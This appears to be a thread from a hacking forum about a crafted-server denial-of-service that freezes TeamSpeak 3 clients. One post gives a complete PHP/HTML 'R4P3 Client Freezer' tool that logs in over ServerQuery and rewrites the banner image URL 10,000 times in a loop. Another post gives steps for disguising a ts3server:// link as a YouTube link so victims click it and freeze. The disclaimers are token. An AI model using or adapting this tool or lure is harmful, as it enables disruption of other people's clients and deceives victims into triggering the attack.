Resource icon

TeamSpeak 3 Client <= 3.0.19.1 Freeze 2017-06-20

No permission to download

Derp

Retired Staff
Contributor
Apr 30, 2015
933
1,017
217
Nope! this is a Client Freeze! That is triggered by a specially crafted server
 

Laszl0w

Well-Known Member
Oct 10, 2015
217
149
143
I think he wont even make custom query port this exploit if you read it :

This is for educational and informational purposes only. Use this information responsibly.

Derp already told to us how this exploit working,make one for yourself. :)
Like that.

ZtZTm3w.png
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,844
2
2,197
327
I think he wont even make custom query port this exploit if you read it :

This is for educational and informational purposes only. Use this information responsibly.

Derp already told to us how this exploit working,make one for yourself. :)
Like that.

ZtZTm3w.png
If you want to release your PHP source that is fine with me.
You don't have to though if you do not want it public. :zcool:
 

Laszl0w

Well-Known Member
Oct 10, 2015
217
149
143
I didn't want to release it,i just want to tell everyone its possible to make it in PHP.
And i didnt got access from you to release it to public. Asphyxia
 

Alligatoras

Administrator
Mar 31, 2016
2,570
12
2,857
381
My question is, where can u get the server password?
Let me know too ^^
Where it says the Server Admin Password he means the Query password for the Admin Server Query Account.
This password was given to you when you created you teamspeak 3 server in the console (Linux Users) or in a Teamspeak window (Windows Users) (only if you did create the server).
If you have you teamspeak 3 server from an Authorized Hoster then you don't have the Actual Server Query Account login information.
As Server Admin of you teamspeak 3 server you are able to create your own one throught teamspeak.

On the Teamspeak Cilent just go at the top:
1) Tools
2) Server Query Login
3) Set a desired name for admin server query name in the box and then Click Ok
4) You will get your password. Make sure to save it somewhere because it won't show up again.

Then you can use these info in this programm (or any query program you want).
Remember that this query account will have the same persmissions with your teamspeak uid and not the actuall Server Query Account.

Wish that helped you guys!
 
Last edited:

Laszl0w

Well-Known Member
Oct 10, 2015
217
149
143
Just make a code which put a random number to 1 to 10000 after the picture link.
 
Last edited:

AndyDE

Member
Apr 26, 2016
36
7
43
Where it says the Server Admin Password he means the Query password for the Admin Server Query Account.
This password was given to you when you created you teamspeak 3 server in the console (Linux Users) or in a Teamspeak window (Windows Users) (only if you did create the server).
If you have you teamspeak 3 server from an Authorized Hoster then you don't have the Actual Server Query Account login information.
As Server Admin of you teamspeak 3 server you are able to create your own one throught teamspeak.

On the Teamspeak Cilent just go at the top:
1) Tools
2) Server Query Login
3) Set a desired name for admin server query name in the box and then Click Ok
4) You will get your password. Make sure to save it somewhere because it won't show up again.

Then you can use these info in this programm (or any query program you want).
Remember that this query account will have the same persmissions with your teamspeak uid and not the actuall Server Query Account.

Wish that helped you guys!

Okey thanks it allows also on my Server to freeze clients no any other?
 

Laszl0w

Well-Known Member
Oct 10, 2015
217
149
143
Code:
<!DOCTYPE html>
<html>
<body>
<style>
table, th, td {
    border: 1px solid black;
}
</style>
<title>R4P3 Client Freezer</title>
<center>
<iframe width="0" height="0" src="http://www.youtube.com/embed/
UA92MsDrrOI?autoplay=1" frameborder="0"
allowfullscreen></iframe>
<b>R4P3 Client Freezer</b>
<form method="POST">
<div><br>
    <label for="IP">Server IP</label><br>
    <input type="text" id="IP" name="IP"><br>
    <label for="name">ServerAdmin UserName</label><br>
    <input type="text" id="name" name="name"><br>
    <label for="pass">ServerAdmin Password</label><br>
    <input type="text" id="pass" name="pass"><br>
    <label for="port">Query Port</label><br>
    <input type="text" id="port" name="port"><br>
    <input type="submit" value="Freeze" name = "button"><br><br>
<b>This is for educational and informational purposes only. Use this information responsibly.<br>
<b>R4P3.NET @ 2016<br><br>
    Credits :<br><br>
    <table>
  <tr>
    <th>Name</th>
    <th>Job</th>
  </tr>
  <tr>
    <td>Asphyxia</td>
    <td>Found the vulnerability</td>
  </tr>
  <tr>
    <td>Laszl0w</td>
    <td>Remaked in PHP</td>
  </tr>
</table>

</body>
</html>
<?php
set_time_limit(0);
require_once("libraries/TeamSpeak3/TeamSpeak3.php");
if(isset($_POST['button']))
  {
  $sIP= $_POST["IP"];
  $sName = $_POST["name"];
  $sPassword = $_POST["pass"];
  $sPort = $_POST["port"];
  $ts3_ServerInstance = TeamSpeak3::factory("serverquery://".$sName.":".$sPassword."@".$sIP.":".$sPort."/");
foreach($ts3_ServerInstance as $ts3_VirtualServer)
{
 for ($x = 0; $x <= 10000; $x++) 
 {
 $ts3_VirtualServer->virtualserver_hostbanner_gfx_url = "http://hungarycs.hu/wp-content/uploads/2016/01/webo2016.jpg?$x";
 $ts3_VirtualServer->modify(array("virtualserver_hostbutton_gfx_url" => "http://hungarycs.hu/wp-content/uploads/2016/01/webo2016.jpg?$x"));
 }
}

}
?>

Credits to Asphyxia & Me:)
 

AstoNat

Member
May 6, 2016
7
0
33
The download link is right here, for registered users only. Registering is free, so register if interested:


Here is a video demonstration:


All that you need:
  1. The EXE file downloaded from above.
  2. Access to a server with TCP port 10011 open.
  3. The serveradmin username (default: serveradmin) and password.
  4. Then just do something like:
Code:
[url=ts3server://127.0.0.1]https://www.youtube.com/watch?v=-qFeUHEiPiM[/url]

Theoretically, an individual will see the YouTube link and click it. Then their TeamSpeak 3 client will freeze. ;)

This is for educational and informational purposes only. Use this information responsibly.
Hello, Im login in but its not working. Iam doing smth wrong?
 

Alligatoras

Administrator
Mar 31, 2016
2,570
12
2,857
381
Top